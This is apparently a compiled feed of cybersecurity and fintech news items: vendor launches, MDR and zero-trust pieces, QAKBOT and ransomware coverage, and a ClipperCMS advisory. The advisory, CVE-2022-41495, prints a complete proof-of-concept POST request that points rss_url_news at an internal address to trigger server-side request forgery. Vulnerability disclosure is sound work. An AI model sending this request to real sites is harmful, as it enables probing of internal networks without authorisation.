Resistant AI and ComplyAdvantage launch AI transaction monitoring solution to combat fraud and money laundering.

LONDON, Oct. 11, 2022 /PRNewswire-PRWeb/ -- Holvi, the digital banking service for small businesses, is among the initial group of customers to implement the AI-driven solution to manage their financial crime risk.

Resistant AI, the AI and machine learning financial crime prevention specialists, and ComplyAdvantage, the financial industry's leading source of AI-driven financial crime risk data and detection technology, today announced the general availability of their solution for fighting financial crime across  
the U.S. and Europe.

Financial crime is a multi-trillion-dollar problem. According to the \[United Nations, the estimated amount of money laundered globally in one year is 2 - 5% of global GDP, or 800 billion - 2 trillion US dollars. While the cost of fraud and money laundering to financial organizations and other businesses is significant, the cost and damage to economies and society as a whole is immeasurable.

Adding Resistant AI's capabilities to ComplyAdvantage's transaction risk monitoring platform extends anti-money laundering (AML) and anti-fraud protections offered to financial institutions and other businesses by:

\-- Enabling them to detect previously unknown patterns of behavior and identify new risks faster.  
\-- Delivering alert prioritization so organizations can focus on the highest-risk areas and make the best use of their investigative resources.

With these capabilities, organizations can transition to a more dynamic approach to financial crime that uncovers novel behavior as it happens.

"Effectiveness and efficacy are key to scaling," comments Valentina Butera, Head of AML and AFC Operations at Holvi. "Integrating an AI-driven transaction monitoring solution means we can grow our customer base without growing our headcount at the same rate. With Resistant AI and ComplyAdvantage, we can manage our known risks more efficiently while also identifying and adapting to previously unknown risks."

Martin Rehak, founder, and CEO at Resistant AI, commented, "We are delighted that our joint solution is now available to drive game-changing efficiency gains. Alert prioritization, the ability to make systems more effective and identify previously unknown risks enables the most effective use of investigative resources and ensures a true risk-based approach."

"In a complex, rapidly shifting world, criminals continue to find new ways to exploit financial services to launder the proceeds of their crimes. At ComplyAdvantage, we are passionate about giving our clients the best tools to protect themselves - and their customers - from these bad actors and fight back.

The addition of Resistant AI's capabilities will allow our clients to do just that," said Charles Delingpole, founder, and CEO at ComplyAdvantage.

Today's announcement coincides with the launch of a new thesis paper on AI in transaction monitoring. Co-authored by ComplyAdvantage and Resistant AI, it explores how customers like Holvi can increase the speed and accuracy with which they monitor transactions for fraud and other financial crime risks.

**About Resistant AI**

Founded in 2019, Resistant AI uses AI and machine learning to provide identity forensic solutions that protect automated financial services from fraud and manipulation, including customer onboarding, AML and existing fraud detection systems. The Resistant AI founding team has a deep background in machine learning, artificial intelligence and computer security with more than 15 years of experience applying AI in the computer security domain. Backed by GV (formerly Google Ventures), Index Ventures, Credo Ventures, Seedcamp, and several angel investors specializing in financial technology and security, Resistant AI is headquartered in Prague with offices in London and New York.

Visit resistant.ai to learn more.

**About ComplyAdvantage**

ComplyAdvantage is the financial industry's leading source of AI-driven financial crime risk data and detection technology. ComplyAdvantage's mission is to neutralize the risk of money laundering, terrorist financing, corruption, and other financial crime. More than 500 enterprises in 75 countries rely on ComplyAdvantage to understand the risk of who they're doing business with through the world's only global, real-time database of people and companies. The company identifies thousands of risk events daily from millions of structured and unstructured data points.

ComplyAdvantage has four global hubs in New York, London, Singapore, and Cluj-Napoca and is backed by Goldman Sachs, Ontario Teachers', Index Ventures, and Balderton Capital. Learn more at https://complyadvantage.com/.

Resistant AI and ComplyAdvantage Launch AI Transaction Monitoring Solution To Combat Fraud and Money Laundering

Categories: Business
With Malwarebytes MDR, our team of cybersecurity professionals acts as an extension to your security team.



(Read more...)




The post Introducing Malwarebytes Managed Detection and Response (MDR) appeared first on Malwarebytes Labs.

With our Managed Detection and Response (MDR) service now generally available for businesses and MSPs, you may be wondering: What is MDR, how does Malwarebytes MDR work, and do I need it?

Underpinned by our award-winning EDR technology, Malwarebytes MDR offers powerful and affordable threat prevention and remediation services, provided by a team of cybersecurity experts that remotely monitors your network 24/7 to detect, analyze, and prioritize threats.

Learn more about Malwarebytes MDR 

**Malwarebytes MDR**

MDR is a service that provides proactive, purpose-built threat hunting, monitoring, and response capabilities powered by a team of advanced cybersecurity technicians, combined with the analysis of robust correlated data. It takes the guesswork out of your most complex cybersecurity threats by delivering 24/7 threat detection, rapid alerts, prevention, and remediation.

Malwarebytes MDR defends your network every day and all night, safeguarding your data, reputation, and finances with always-on dedicated protection.

While it’s technically possible for SMBs to build out their own MDR program in-house, doing so is a time, expense, and effort equivalent to starting an entirely new IT security department. You’ll need to build out your own SOC facilities, hire a minimum of five full-time employees to provide 24/7 coverage, and so on. That’s why many SMBs opt to outsource their MDR to a service provider.

Our experts are your experts: With Malwarebytes MDR, our team of cybersecurity professionals acts as an extension to your security team, ensuring that you have the staff, skill, and experience you need to maximize your cybersecurity posture on a 24/7 basis.

Malwarebytes MDR

**Malwarebytes MDR workflow**

To recap, the basic workflow for Malwarebytes MDR goes like this:

1.  The Malwarebytes MDR team monitors and analyzes your system, checking for IOCs and threat hunting, and finds something malicious.
    
2.  Our MDR team sends you an email alerting you to the threat and asking you to go to the MDR portal in Nebula.
    
3.  You log into Nebula and click on the MDR portal in the upper-righthand corner.
    
4.  In the main portal view you can see a basic log of everything that the analysts have done on that specific system. Click “Go to Case” for more details on specific threats.
    
5.  Clicking “**Go to Case**” will bring you back to Nebula for whatever suspicious activity or alert that the MDR team needs you to remediate.
    
6.  You do the remediation, go back to the MDR portal, and tell the MDR team that you've completed it.
    
7.  The MDR team closes out the alert.
    

**How it works**

Malwarebytes MDR workflow

It all starts with contextual enrichments. EDR alerts are enriched with context from threat intelligence feeds:

1.  **Customer telemetry data from all deployed Malwarebytes products ingested.**
    
    1.  EDR (including Brute Force Protection) and Cloud Security Modules
        
2.  **Threat intelligence feeds from multiple sources ingested**
    
    1.  Premium external threat feeds
        
    2.  Internal Malwarebytes feeds including crowd-sourced intelligence from the entire Malwarebytes customer base (B2B and Consumer)
        
    3.  Open-source feeds
        
3.  **Telemetry data and threat intelligence correlated with alert**
    
    1.  Generates additional context to the alert (e.g., more clues to the behavior and origin)
        

The MDR Analyst Team monitors endpoint alerts 24x7 to field incoming alerts:

1.  **Artifacts of alert rapidly reviewed and prioritized for triage**
    
    1.  Automations sift through the artifacts (processes, actions, etc) to identify most interesting
        
2.  **Case opened on each artifact requiring triage**
    
    1.  Notification provided to customer within MDR Portal
        
3.  **Case analyzed by MDR Analyst team**
    
    1.  Deep analysis and review leveraging enriched alerts
        
    2.  Escalation to Tier 3 analysts, 2nd opinions within the team
        
4.  **‘Best course of action’ decided and communicated**
    
    1.  MDR Analysts communicate one of two possible decisions via the customer portal:
        
        1.  Customer verification of artifact required 
            
        2.  Remediation required
            

Then comes the options for remediation:

1.  **Malwarebytes managed** 
    
    1.  Malwarebytes automatically provides remediation by removing threats using EDR capabilities 
        
    2.  Re-boot, re-imaging, and other onsite tasks will require customer involvement
        
2.  **Collaborative**
    
    1.  Malwarebytes notifies customer who can authorize managed remediation or perform remediation themselves
        
    2.  Work together to take care of it outside of biz hours, etc
        
3.  **Manual (customer does it, guidance from MWB)**
    
    1.  Malwarebytes provides notification to customer with detailed guidance to perform remediation themselves
        

Finally, for case closure:

1.  **Closure notification to customer within the MDR portal**
    
2.  **History of closed cases available for compliance and reporting needs**
    
    1.  Case event details available to customer
        

**Want to learn more?**

If you want to know more about MDR and if it's right for you, check out these resources:

*   ****Get the eBook:** Is MDR right for my business?**
*   ****3 ways MDR can drive business growth for MSPs****
*   ****Cyber threat hunting for SMBs: How MDR can help****
*   ****EDR vs MDR vs XDR–What’s the Difference?****

Introducing Malwarebytes Managed Detection and Response (MDR)

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php.

There is a SSRF vulnerability in the rss\_url\_news parameter of the index.php?a=30 interface in ClipperCMS-clipper\_1.3.3

    POST /manager/index.php?a=30 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 6669
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=17
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: close
    
    site_id=6310b3eb4111b&settings_version=1.3.3&site_name=My+Clipper+Site&valid_hostnames=&modx_charset=UTF-8&xhtml_urls=1&site_start=1&error_page=1&unauthorized_page=1&site_status=1&site_unavailable_page=&reload_site_unavailable=&site_unavailable_message=The+site+is+currently+unavailable&siteunavailable_message_default=The+site+is+currently+unavailable.&track_visitors=0&auto_template_logic=parent&template_rules_tv=&default_template=3&old_template=3&publish_default=0&cache_default=1&search_default=1&auto_menuindex=1&txt_custom_contenttype=&custom_contenttype=application%2Frss%2Bxml%2Capplication%2Fpdf%2Capplication%2Fvnd.ms-word%2Capplication%2Fvnd.ms-excel%2Ctext%2Fhtml%2Ctext%2Fcss%2Ctext%2Fxml%2Ctext%2Fjavascript%2Ctext%2Fplain&server_offset_time=0&server_protocol=http&rss_len=10&error_handling_deprecated=1&error_handling_silent=0&jquery_url=assets%2Fjs%2Fjquery.min.js&jquery_plugin_dir=assets%2Fjs%2F&jquery_noconflict=1&friendly_urls=0&friendly_url_prefix=&friendly_url_suffix=.html&friendly_alias_urls=1&use_alias_path=0&allow_duplicate_alias=0&automatic_alias=1&use_udperms=1&udperms_allowroot=0&failed_login_attempts=3&webuser_hash_method=1&blocked_minutes=60&reload_captcha_words=&captcha_words=Clipper%2CAccess%2CBetter%2CBitCode%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2CTattoo%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&captcha_words_default=ClipperCMS%2CAccess%2CBetter%2CBitCode%2CChunk%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2COscope%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CTattoo%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&emailsender=1%401.com&smtp=0&smtp_host=&smtp_port=&smtp_prefix=ssl&smtp_user=&smtp_pass=&reload_emailsubject=&emailsubject=Your+login+details&emailsubject_default=Your+login+details&reload_signupemail_message=&signupemail_message=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_signup_default=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_websignupemail_message=&websignupemail_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_websignup_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_system_email_webreminder_message=&webpwdreminder_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_webreminder_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&manager_language=english&manager_theme=ClipperModern&warning_visibility=1&docid_visibility=1&tree_page_click=27&remember_last_tab=1&tree_show_protected=0&rss_url_news=http%3A%2F%2F192.168.156.136%3A88%2F123&rss_url_security=http%3A%2F%2F192.168.156.136%3A88%2F123123123&datepicker_year_range=-10&date_format=dd-mm-yy&time_format=HH%3Amm%3Ass&number_of_logs=100&number_of_results=20&validate_referer=1&strip_image_paths=1&use_browser=1&rb_webuser=0&rb_base_dir=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2Fassets%2F&rb_base_url=assets%2F&file_browser=kcfinder&upload_images=bmp%2Cico%2Cgif%2Cjpeg%2Cjpg%2Cpng%2Cpsd%2Ctif%2Ctiff&upload_media=au%2Cavi%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cwav%2Cwmv&upload_flash=fla%2Cflv%2Cswf&clean_uploaded_filename=0&use_editor=1&which_editor=TinyMCE&fe_editor_lang=english&editor_css_path=&tinymce_editor_theme=editor&tinymce_custom_plugins=style%2Cadvimage%2Cadvlink%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cfullscreen%2Cnonbreaking%2Cxhtmlxtras%2Cvisualchars%2Cmedia&tinymce_custom_buttons1=undo%2Credo%2Cselectall%2Cseparator%2Cpastetext%2Cpasteword%2Cseparator%2Csearch%2Creplace%2Cseparator%2Cnonbreaking%2Chr%2Ccharmap%2Cseparator%2Cimage%2Clink%2Cunlink%2Canchor%2Cmedia%2Cseparator%2Ccleanup%2Cremoveformat%2Cseparator%2Cfullscreen%2Cprint%2Ccode%2Chelp&tinymce_custom_buttons2=bold%2Citalic%2Cunderline%2Cstrikethrough%2Csub%2Csup%2Cseparator%2Cbullist%2Cnumlist%2Coutdent%2Cindent%2Cseparator%2Cjustifyleft%2Cjustifycenter%2Cjustifyright%2Cjustifyfull%2Cseparator%2Cstyleselect%2Cformatselect%2Cseparator%2Cstyleprops&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&filemanager_path=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2F&upload_files=aac%2Cau%2Cavi%2Ccss%2Ccache%2Cdoc%2Cdocx%2Cgz%2Cgzip%2Chtaccess%2Chtm%2Chtml%2Cjs%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cods%2Codp%2Codt%2Cpdf%2Cppt%2Cpptx%2Crar%2Ctar%2Ctgz%2Ctxt%2Cwav%2Cwmv%2Cxls%2Cxlsx%2Cxml%2Cz%2Czip&upload_maxsize=1048576&new_file_permissions=0644&new_folder_permissions=0755

CVE-2022-41495: insight/ClipperCMS SSRF2.md at master · jayus0821/insight

Distrust and verify, because you can't protect what you can't see.

Even before the Biden administration announced US federal agencies and contractors must adopt new zero-trust cybersecurity standards, many enterprise-level companies had already begun their journeys toward zero-trust architecture (ZTA) adoption.

According to a recent survey conducted by Forrester, 78% of global security leaders said they plan to bolster zero-trust operations this year, though only 6% said they have fully implemented their zero-trust projects. These organizations recognize that networks today can be local, reach into the cloud, or extend anywhere remote workers are — which limits the effectiveness of traditional defenses.

In dealing with direct attacks such as the recent Log4j vulnerability, indirect attacks such as phishing with malware, and internal lateral movement, traditional perimeter-based network access control has proven insufficient in detecting, much less preventing, compromise. Zero trust — based on the concept that users must be authenticated and continuously validated to be granted access to applications and data — is much more effective because it protects resources rather than network segments.

But successful execution is more like a journey than a switch that can be flipped on. It requires various technologies working together — including multifactor authentication, endpoint security, and identity protection — with full zero-trust adoption becoming an ongoing process of enhancements, refinements, and policy adjustments.

There's an old adage that became well known during the Cold War: "Trust, but verify." More of each is needed in today's highly distributed world, where networked environments are dynamic and network infrastructure, services, users, and more can rapidly change. Organizations cannot blindly assume their zero-trust architecture (ZTA) is always functioning as intended. Organizations need to actively distrust _and_ verify as they refine their network infrastructure, services, and operational policies. Thankfully, continuous deep packet monitoring provides the independent intelligence necessary to improve policy enforcement decisions.

**The Role of Deep Packet Monitoring**

In the Zero Trust Maturity Model laid out by the Cybersecurity and Infrastructure Security Agency (CISA), five distinct pillars reflect how advanced an organization is in its zero-trust implementation. Cutting across these pillars are guidelines for visibility and analytics, automation and orchestration, and governance — suggesting the need for cross-pillar collaboration, integration, and management for more mature ZTAs.

In traditional, non-zero-trust deployments, packet monitoring at the perimeter and occasionally in sensitive areas of the internal network provides the foundation for network visibility and analytics. But as an organization's ZTA matures, traditional perimeters blur or even vanish altogether. North-south traffic will always need to be seen and controlled, but equally as importantly, east-west traffic must be seen and controlled to detect and prevent lateral or deeper compromise in the environment. To achieve zero-trust maturity, pervasive network visibility of the entire network through deep packet monitoring is required.

Packets are the best source of high-fidelity network data available, especially for organizations further along in their digital transformation journeys toward greater public or hybrid cloud use. In these environments, organizations often lose a degree of visibility compared with traditional data centers, and traditional cybersecurity safeguards like endpoint defenses may not even come into play. Packet data transcends the limitations of distributed infrastructure to help verify performance and policy compliance in near real time, offering a single source of truth that can be analyzed months or even years later.

While networking teams have traditionally used packet monitoring to analyze networks, manage traffic, and identify performance issues, the data that packets provide to security teams can be just as invaluable for threat detection and investigations. Packet data allows security teams to trace communications between interconnected devices and historical trends, for example, and can assist in orchestrating mitigation between management and enforcement tools through APIs. It also fills in visibility and data gaps left by other cybersecurity tools (e.g., security information, event management, and endpoint detection), making those tools and existing cybersecurity staff more effective. Finally, organizations can use packet monitoring to classify networks, servers, and services based on risk, allowing for very rapid and concise verification of ZTA.

In summary, enterprises just beginning their zero-trust journeys will require refinements to their architectures as they mature. Their solutions will increasingly rely on automated processes and systems, with greater integration across pillars and more dynamic policy enforcement decisions. For these systems to remain successful, continuous validation of zero-trust designs and enforcement boundaries is required, and deep packet monitoring offers the most comprehensive level of visibility available to verify their effectiveness.

At the end of the day, zero trust is a philosophy. To buy in completely, nothing can be taken for granted. Even organizations with more mature zero-trust implementations must continually verify their adherence with constant, pervasive network visibility. After all, you can't protect what you can't see, and what you can't see, you shouldn't trust.

Comprehensive Network Visibility Is Imperative for Zero-Trust Maturity

The QAKBOT group has successfully ramped up its operations, infecting systems, installing attack frameworks, and selling access to other groups, including Black Basta.

The QAKBOT malware group resumed expanding its access-as-a-service network in early September, successfully compromising hundreds of companies with common second-stage payloads, including Emotet malware and two popular attack platforms, threat researchers said this week.

In the most recent incident, cybersecurity firm Trend Micro observed QAKBOT-infected systems deploying Brute Ratel, an "adversary emulation" platform used by penetration testers, but also — along with Cobalt Strike — used by cybercriminals for its sophisticated capabilities. Another group, known as Black Basta, is likely responsible for the subsequent attacker activity using the two platforms, Trend Micro said.

Black Basta's use of the QAKBOT, also known as QBot or Pinkslipbot, highlights how cybercriminal groups are specializing in particular attack-chain activities, says Jon Clay, vice president of threat intelligence for Trend Micro.

"QBot appears to have improved their offering as they have to compete with other groups selling similar services in the underground — BlackBasta is one such group that feels their tool set works for them," he says. "They continue to update their code and malware to enhance obfuscation and ability to successfully compromise victims."

After QAKBOT infects a system, the attack tools conducts automated reconnaissance and then downloads and installs Brute Ratel, which is then used by Black Basta to move laterally to other systems in the network and execute payloads, according to Trend Micro's report.

Other security firms have also noted that cybercriminal groups have increasingly focused on specific elements of the attack chain. While QAKBOT started out as a banking trojan, different groups have augmented its capabilities with additional modules, according to the NCC Group, a threat intelligence firm.

"QBot is considered a banking Trojan, but thanks to its modular design, it can also act as an infostealer, a backdoor — with its _backconnect_ module — and a downloader," the Global Threat Intelligence Team at NCC Group said in response to questions from Dark Reading, adding: "After the takedown attempt on Emotet and the recent pause of its operation, QBot and Bokbot had been sharing the market."

The approach has garnered success for the group. In a separate report, threat researchers at cybersecurity firm Kaspersky said that QAKBOT had infected at least 1,800 victims, at least half of which are business systems or workers' computers.

Black Basta is just one of the groups that have either use a QAKBOT service or distribute the malware themselves. The Black Basta group first appeared in April, conducting double extortion operations in which the attacker installs ransomware and steals data to put pressure on the business to pay the ransom. The group is likely made up of member of the Conti gang, which dissolved in May, but whose members continue to be a threat.

**Brute Ratel in the QAKBOT Mix**  
In May, a malicious file linked to the attack tool, Brute Ratel, was uploaded to VirusTotal, a common way to check whether current anti-malware scanners can detect a new variant. None of the 56 scanners detect that the file contained malicious code, Mike Harbison and Peter Renals, two threat researchers at network security firm Palo Alto Networks, wrote in an analysis of Brute Ratel in July.

The attack likely came from a Russian group known as APT29 and poses issues for companies, the researchers stated.

"While \[Brute Ratel C4\] has managed to stay out of the spotlight and remains less commonly known than its Cobalt Strike brethren, it is no less sophisticated," Harbison and Renals wrote. "Instead, this tool is uniquely dangerous in that it was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities."

Trend Micro concurred with Palo Alto Networks that, while Cobalt Strike is a well-known payload used by many cybercriminals, more attackers are starting to use Brute Ratel for extending their compromise and delivering payloads, especially after stolen code and leaked licenses have made pirated copies of the software available.

Obscurity helps the program be successful, Trend Micro stated in its analysis.

"This makes Brute Ratel and other less established C2 frameworks an increasingly more attractive option for malicious actors, whose activities may remain undetected for a longer period," the company stated.

Since the current QAKBOT group extensively uses spam, targeted emails, and compromising email threads as a way to distribute the initial links and malware, Trend Micro recommends that users follow email security best practices, such as verifying the email sender and content before downloading attachments and hovering over embedded links to see the actual target URL. Security-awareness training is important part of raising the level needed to infect a company.

QAKBOT Attacks Spike Amid Concerning Cybercriminal Collaborations

SAS and Neterium partnered to deliver Neterium’s next-gen screening capabilities on SAS’ analytics platform.

Cary, NC (Oct 10, 2022) The volume, velocity and complexity of today’s sanctions screening landscape require extraordinary vigilance, backed by best-of-breed analytics and data orchestration that empower always-on monitoring and immediate action. To meet these modern-day thresholds, Paris-based Orange Bank teamed with SAS and Neterium to achieve real-time sanctions screening in the cloud.

“Our newly deployed AML-CTF platform, powered by SAS and Neterium, is already proving to be a game-changer,” said Veronique McCarroll, Deputy CEO of Orange Bank.

Ever committed to staying at the forefront of banking innovation, Orange Bank began contemplating new sanctions screening tools in 2021. Going real-time would enable its compliance team to bolster the French bank’s anti-money laundering (AML) and counter-terrorist financing (CTF) guardrails. The bank also aimed to streamline the varied tools used and managed by its analysts. It relied on SAS to deliver on its vision.

Achieving next-gen sanctions screening

“As we considered complementing technologies that would help Orange Bank achieve the agility and responsiveness it required, Neterium was an immediate standout,” said Stu Bradley, Senior Vice President of Fraud and Security Intelligence at SAS. “SAS chose to partner with Neterium to provide the real-time sanctions screening engine because of the efficiency, effectiveness and scalability of its solutions, and also for the explainability of its AI-driven decisioning.”

Over a period of nine months, SAS and Neterium collaborated to align Neterium’s cloud-native real-time “watchlist screening-as-a-service” with SAS® Visual Investigator. Neterium’s dual API-based offerings, Jetscan and Jetflow, operate seamlessly on the SAS platform. The potent synthesis gives Orange Bank automated entity and transaction screening against major government and global watchlists as well as politically exposed persons (PEP) lists.

“Built-in AI and advanced screening technologies improve detection relevance and allow our analysts to monitor a holistic, real-time view of AML risk,” said McCarroll. “I’m confident this implementation will sustainably increase our team’s efficiency and effectiveness – and, likewise, that we leverage the best technology partners to continually enhance our integrated compliance platform.”

“By focusing exclusively on developing infinitely scalable screening capabilities delivered through an API, Neterium has mastered the nuances and complexities of what is perhaps the most confounding facet of financial crimes compliance,” said Florence Vicentini, Chief Commercial Officer and Head of Partnerships at Neterium. “The depth and breadth of SAS’ financial crimes compliance platform is similarly unmatched in the market, which makes the connecting of our technologies and capabilities for Orange Bank a formidable mix.”

“The world’s volatile geopolitical landscape is fraught with risks that demand a real-time view of entities and transactions in the context of ever-expanding sanctions watchlists,” added SAS’ Bradley. “Achieving real-time sanctions screening will help Orange Bank address their compliance challenges through reduced false positives, enhanced performance and improved operational efficiency.”

Today’s announcement was made during Sibos 2022, the world’s global, premier financial services event, convening in Amsterdam, Oct. 10-13. Attendees are invited to engage with SAS experts on sanctions screening and other topics throughout the conference at Sibos Booth B115.

About SAS

SAS is the leader in analytics. Through innovative software and services, SAS empowers and inspires customers around the world to transform data into intelligence. SAS gives you THE POWER TO KNOW.

Orange Bank Deploys Real-Time Sanctions Screening with SAS and Neterium

Ransomware attacks are on the rise, but organizations also have access to advanced tools and technologies they can use to fight back.

Ransomware is a hot topic. No industry is immune, and the ransomware gangs behind these attacks are making a lot of money with minimal risk of being caught. However, every industry has increasing access to the advanced tools and technologies needed to fight back.

In the past few years, ransomware attacks have evolved to include crippling, networkwide attacks using multiple extortion methods to target both your data and reputation, all enabled by human intelligence. This has led to ransomware operators driving their profits to unprecedented levels, with predictions noting that the total cost of ransomware attacks will reach $265 billion by 2031.

We have seen a major shift from commodity ransomware attacks to human-operated ransomware. These “hands-on-keyboard” attacks target an entire organization rather than a single device or individual, leveraging human attackers’ knowledge of common system and security misconfigurations to get in, navigate the enterprise network, and adapt to the environment and its weaknesses as they go.

Attackers use a three-step approach to carry out successful human-operated ransomware attacks. First, they gain initial access to an environment using primarily identity attacks (via email, browser, password spray, etc.). Once the attackers have gained access to the organization, they then move laterally within the network to steal more credentials to gain elevated privileges and ultimately find an admin account that gives them access to data. Now that the attackers have access to the data, they can steal it, encrypt it, and deploy a ransomware payload to the resources of their choosing. This type of attack results in catastrophic outcomes for business operations that are very difficult to clean up.

**Ways to Prepare**

Given how common these ransomware attacks are and how easy they are to carry out, what can you and your organization do to prepare for future attacks?

First, we strongly recommend implementing a zero-trust approach. Based on the three principles of verify explicitly, use least-privileged access, and assume a breach, a comprehensive zero-trust architecture creates several safeguards within and across identity, endpoints, apps, infrastructure, network, and data. We not only recommend this approach with our customers and partners, but we also embrace it in our own approach to global security and software development here at Microsoft.

Next, integrated threat protection helps secure organizations by using the combination of extended detection and response (XDR) and security information and event management (SIEM) tools to detect attacks _while_ they are happening and stop them. Cloud-native SIEM systems can help eliminate security infrastructure setup and maintenance while scaling to meet organizational security needs and without being restricted by storage or query limits. Likewise, cross-domain threat protection, cloud security posture management (CSPM), and cloud workload protection (CWP) solutions can be deployed to increase efficiency and effectiveness while securing your digital estate.

Lastly, we recommend having a backup and incident response (IR) plan prepared in the event that your organization is compromised. It is crucial to back up all critical systems automatically on a regular basis and ensure all backups are protected against deliberate erasure/encryption. Your backup service should offer a centralized management interface to monitor, govern, and optimize data protection at scale, and you should look for a platform that can secure your backup platform whether data is in transit or at rest.

For incident response, organizations need to ensure rapid detection and remediation of common attacks on endpoint, email, and identity (ransomware operators love these three) by prioritizing common entry points and monitoring for adversaries disabling security. It is important to regularly practice these backup and incident response plans.

Mitigating human-operated ransomware attacks is a top priority for organizations worldwide. By implementing these strategies and tools outlined in our ransomware mitigation plan, organizations can be fearless, armed with the ability to secure everything without limits.

The Playbook for Human-Operated Ransomware

From the basics to advanced techniques, here's what you should know.

Cybersecurity has been compared to a never-ending game of whack-a-mole, with an ever-changing cast of threats and threat actors. While the attacks that make headlines may change from year to year, the basic fact remains: Any network, no matter how obscure the organization it supports, most likely will come under attack at some point. Thus, attaining and maintaining a strong security posture is of critical importance for organizations of any size.

An organization's security posture, however, is constantly changing. Employees join or leave the company; endpoints are added and discarded; and network and security technologies are deployed, decommissioned, configured, and updated. Each change in network elements can represent a potential attack vector for malware and other threats.

